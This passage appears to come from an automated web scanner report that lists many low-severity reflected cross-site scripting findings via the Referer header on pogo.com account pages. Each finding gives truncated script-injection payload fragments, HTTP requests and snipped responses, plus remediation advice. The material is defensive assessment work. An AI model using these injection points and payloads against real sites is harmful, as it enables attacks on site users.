HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:04:05 GMT Server: Apache-Coyote/1.1 Content-Length: 35192 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.662. http://www.pogo.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f55a</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /?sl=2&f9258%22%3E Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:11:13 GMT Server: Apache-Coyote/1.1 Content-Length: 429868 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Free Pogo Home Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:: s.prop8="Non Authenticated"; if (typeof ...[SNIP]... |
3.663. http://www.pogo.com/account/my-account.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/my-account.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc5f7</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/my-account.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:57 GMT Server: Apache-Coyote/1.1 Content-Length: 35390 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.664. http://www.pogo.com/account/my-account/confirm-recover-password.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/my-account |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 990a5</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/my-account Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:00:48 GMT Server: Apache-Coyote/1.1 Content-Length: 35626 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.665. http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/my-account/edit |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e38fd</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/my-account/edit Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Origin: http://www.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:06:35 GMT Server: Apache-Coyote/1.1 Content-Length: 36114 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.666. http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/my-account/edit |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e862</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/my-account/edit Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:35 GMT Server: Apache-Coyote/1.1 Content-Length: 35607 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.667. http://www.pogo.com/account/my-account/main.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/my-account/main |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c90</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/my-account/main Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:02:23 GMT Server: Apache-Coyote/1.1 Content-Length: 35444 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.668. http://www.pogo.com/account/my-account/recover.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/my-account |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f349d</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/my-account Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:00:54 GMT Server: Apache-Coyote/1.1 Content-Length: 35473 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.669. http://www.pogo.com/account/my-account/recover.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/my-account |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9393</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/my-account Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Origin: http://www.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:58:59 GMT Server: Apache-Coyote/1.1 Content-Length: 36302 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_header s.prop7="POGO:pogo:::Pog ...[SNIP]... |
3.670. http://www.pogo.com/account/verify-password.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/verify-password |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd99d</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/verify-password Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Origin: http://www.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:00:50 GMT Server: Apache-Coyote/1.1 Content-Length: 35816 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.671. http://www.pogo.com/account/verify-password.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/verify-password |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3627</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /account/verify-password Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache-Coyote/1.1 Content-Length: 35436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.672. http://www.pogo.com/action/pogo/confirmation.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/confirmation |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4dcc</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogo/confirmation Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:00:39 GMT Server: Apache-Coyote/1.1 Content-Length: 35455 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.673. http://www.pogo.com/action/pogo/createAccount.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/createA |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 743ee</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogo/createA Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
